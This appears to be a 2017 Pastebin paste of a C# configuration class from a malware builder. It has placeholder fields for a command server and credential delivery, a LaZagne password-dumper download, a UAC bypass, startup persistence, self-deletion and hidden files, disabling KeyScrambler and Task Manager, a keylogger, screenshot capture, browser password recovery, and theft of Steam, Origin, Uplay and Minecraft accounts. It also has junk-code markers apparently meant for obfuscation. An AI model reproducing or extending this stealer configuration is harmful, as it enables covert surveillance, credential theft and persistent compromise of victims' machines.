Advertisement
FexileTV

Untitled

Mar 4th, 2017
271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.95 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Windows.Forms;
  7.  
  8. namespace apple
  9. {
  10.  
  11. //JUNK_7//
  12.  
  13. class core_settings
  14. {
  15. /* ALL SETTINGS */
  16.  
  17. /* FRAMEWORK */
  18. public static bool debug = false;
  19.  
  20. public static string mutex_primary = "{MUTEX_PRIMARY}";
  21.  
  22. public static string nexus_api_user = "{NEXUS_API_USER}";
  23. public static string nexus_api_user_token = "{NEXUS_API_USER_TOKEN}";
  24. public static string nexus_api_server = "{NEXUS_API_SERVER}";
  25. public static string nexus_api_delivery_id = "{NEXUS_API_DELIVERY_ID}";
  26. public static string nexus_api_delivery_pw = "{NEXUS_API_DELIVERY_PW}";
  27. public static string nexus_api_delivery_key = "{NEXUS_API_DELIVERY_KEY}";
  28.  
  29. public static string lazagne_dl = "{LAZAGNE_DL}";
  30.  
  31. /* DELIVERY */
  32. public static string delivery_method = "{DELIVERY_METHOD}";
  33. public static int delivery_interval = 1;
  34.  
  35. /* INSTALLATION */
  36. public static string location = "";
  37. public static string directory = "{INSTALL_DIRECTORY}";
  38. public static string process_name = "{INSTALL_PROC_NAME}";
  39.  
  40. public static bool startup_with_windows = true;
  41. public static string startup_key_0 = @"{SKEY_0}";
  42. public static string startup_key_1 = @"{SKEY_1}";
  43.  
  44. /* CORE */
  45. public static string uac_bypass = "{UAC_BYPASS}";
  46. public static string critical_system_process = "{CRITICAL_PROCESS}";
  47.  
  48. public static bool advanced_melt = true;
  49. public static bool hidden_file = true;
  50.  
  51. public static bool disable_keyscrambler = true;
  52. public static bool disable_taskmanager = false;
  53. public static bool disable_regedit = false;
  54. public static bool disable_commandprompt = false;
  55. public static bool disable_msconfig = false;
  56.  
  57. /* KEYLOGGER */
  58. public static bool keylogger = true;
  59.  
  60. public static bool screenshot_logger = true;
  61. public static int screenshot_interval = 1;
  62.  
  63. /* BLOCKERS */
  64. public static bool process_blocker = false;
  65. public static string processes_to_block = "{PROCESSES_TO_BLOCK}";
  66.  
  67. public static bool site_blocker = false;
  68. public static string sites_to_block = "{WEBSITES_TO_BLOCK}";
  69.  
  70. /* RECOVERIES */
  71. public static bool core_password_recovery = true;
  72. public static bool core_recovery_close_browser = false;
  73.  
  74. public static bool client_recovery_steam = false;
  75. public static bool client_recovery_origin = false;
  76. public static bool client_recovery_uplay = false;
  77. public static bool client_recovery_minecraft = false;
  78.  
  79. /* PAYLOAD NOTIFY */
  80. public static string install_message = "{INSTALL_MESSAGE}";
  81. public static bool install_message_show = true;
  82. }
  83.  
  84. //JUNK_8//
  85.  
  86. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement